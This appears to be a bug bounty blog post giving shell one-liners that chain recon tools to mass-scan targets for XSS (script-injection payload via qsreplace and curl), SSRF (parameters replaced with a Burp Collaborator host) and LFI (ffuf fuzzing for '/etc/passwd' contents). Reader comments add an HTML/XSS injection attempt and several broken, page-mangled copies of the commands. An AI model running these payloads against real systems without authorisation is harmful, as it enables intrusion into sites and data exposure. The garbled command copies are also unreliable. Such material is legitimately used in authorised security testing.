You are currently viewing Find SSRF , LFI , XSS using httpx , waybackurls , gf , gau , qsreplace

Find SSRF , LFI , XSS using httpx , waybackurls , gf , gau , qsreplace

Hello All

Today will see how you can find ssrf xss and lfi using gf , httpx , waybackurls , qsreplace , gau tool .

This will help you in bug bounty because it’s advance bug bounty tips i have also a YouTube channel please visit there and watch video on advance subdomain recon and subdomain takeover and some poc video is also there. So let’s start

XSS

First let’s start find xss for these we will use these tools gf , httpx , waybackurls , qsreplace , and command is like this :

cat file.txt | gf xss | grep ‘source=’ | qsreplace ‘”><script>confirm(1)</script>’ | while read host do ; do curl –silent –path-as-is –insecure “$host” | grep -qs “<script>confirm(1)” && echo “$host 33[0;31mVulnerablen”;done

This command will find xss in target domain .

SSRF

Now let’s see how we can find ssrf using these tools. Here is command to find SSRF on Target urls

findomain -t example.com -q | httpx -silent -threads 1000 | gau |  grep “=” | qsreplace http://YOUR.burpcollaborator.net

Here it will Filter the possible parameter of ssrf and also will send the request to your collaborator.

LFI

Follow this command to find LFI

findomain -t example.com -q |  waybackurls |gf lfi | qsreplace FUZZ | while read url ; do ffuf -u $url -mr “root:x” -w ~/wordlist/LFI.txt ; done

 

Thanks 

This Post Has 23 Comments

  1. Unknown

    Amezing bro thank you

  2. Unknown

    <a href="https://youtu.be/cgZoVCQeAP0&quot; style="color:red; background:yellow; >Dear sir your video and block artical is verry good. excilent. But <bold><center> this comment section is vurniable from xss </center></bold></a>

  3. Monu

    Thanks to all

  4. Amol

    Nice video

  5. adnan

    cat file.txt | gf xss | grep ‘source=’ | qsreplace ‘”>confirm(1)’ | while read host do ; do curl –silent –path-as-is –insecure “$host” | grep -qs “confirm(1)” && echo “$host 33[0;31mVulnerable\n”;done

    bash: syntax error near unexpected token `<‘
    please help me !!

    1. mrblack

      its because you have copy pasted cmnd directly from here

      use this command

      cat file.txt | gf xss | grep ‘source=’ | qsreplace ‘”>confirm(1)’ | while read host do ; do curl –silent –path-as-is –insecure “$host” | grep -qs “confirm(1)” && echo “$host \033[0;31mVulnerable\n”;done

  6. Anil kumar

    zsh: parse error near `<‘
    its showing this error

  7. Anil kumar

    zsh: parse error near `<‘

  8. cyrus

    Getting error while running the command ” no such pattern” pls somebody help

    1. admin

      Install patterns from github

  9. dilip

    cat file.txt | gf xss | grep ‘source=’ | qsreplace ‘”>confirm(1)’ | while read host do ; do curl –silent –path-as-is –insecure “$host” | grep -qs “confirm(1)” && echo “$host \033[0;31mVulnerable\n”;done
    bash: syntax error near unexpected token `<‘

    1. admin

      change your payload

    2. admin

      change your payload and try again

  10. Hargun Singh

    i have tried so many payload command is not working

Leave a Reply